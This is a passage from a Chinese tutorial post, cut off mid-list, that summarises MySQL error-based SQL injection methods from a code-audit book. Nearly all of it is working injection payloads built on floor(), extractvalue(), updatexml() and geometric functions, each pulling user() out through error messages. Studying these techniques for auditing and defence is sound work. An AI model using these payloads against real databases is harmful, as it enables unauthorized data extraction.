看大佬们的文章看得我虎躯一震,精神抖擞,于是心血来潮,整理一下MySQL报错注入常见的手段和方法,再举几个例子
《代码审计:企业级Web代码安全架构》一书中介绍过报错注入十大方法,依次是:
1.floor() 如:select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue() 如:select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml() 如:select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection() 如:select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint() 如:select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon() 如:select * from test where id=1 and polygon((select * from(select *